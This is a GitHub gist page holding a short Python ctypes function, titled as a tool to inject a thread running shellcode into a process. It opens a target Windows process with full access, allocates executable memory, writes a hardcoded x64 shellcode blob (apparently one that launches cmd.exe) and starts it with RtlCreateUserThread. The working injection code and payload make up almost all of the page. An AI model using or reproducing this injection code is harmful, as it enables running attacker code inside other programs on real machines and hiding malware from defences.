Created
September 29, 2017 17:00
-
-
Save sudhackar/445af7f8b38640c6097845478b29fe47 to your computer and use it in GitHub Desktop.
Inject a thread running your shellcode into a process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def InjectTo(proc_name): | |
| dwDesiredAccess = 0x1f0fff # PROCESS_ALL_ACCESS | |
| dwProcessId = GetPid(proc_name) | |
| if not dwProcessId: | |
| debug_print("\t[-] No such process") | |
| hProcess = kernel32.OpenProcess(dwDesiredAccess, False, dwProcessId) | |
| if hProcess == 0: | |
| debug_print("\t[-] Failed to get a handle to : %s" % (proc_name)) | |
| return | |
| debug_print("\t[*] Handle to %s : 0x%x" % (proc_name, hProcess)) | |
| pop_cmd = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00" | |
| flProtect = 0x40 # RWX | |
| flAllocationType = 0x1000 # MEM_COMMIT | |
| kernel32.VirtualAllocEx.restype = c_ulonglong | |
| pShellcode = kernel32.VirtualAllocEx(hProcess, 0, len(pop_cmd), flAllocationType, flProtect) | |
| kernel32.WriteProcessMemory.restype = BOOL | |
| kernel32.WriteProcessMemory.argtypes = (HANDLE, c_ulonglong, c_void_p, c_ulonglong, c_void_p) | |
| kernel32.WriteProcessMemory(hProcess, pShellcode, pop_cmd, len(pop_cmd), 0) | |
| hThread = HANDLE() | |
| ntdll.RtlCreateUserThread.argtypes = (HANDLE, c_void_p, BOOL, c_ulonglong, c_void_p, c_void_p, c_ulonglong, c_void_p, LPVOID, c_ulonglong) | |
| ntdll.RtlCreateUserThread(hProcess, None, 0, 0, 0, 0, pShellcode, 0, byref(hThread), 0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment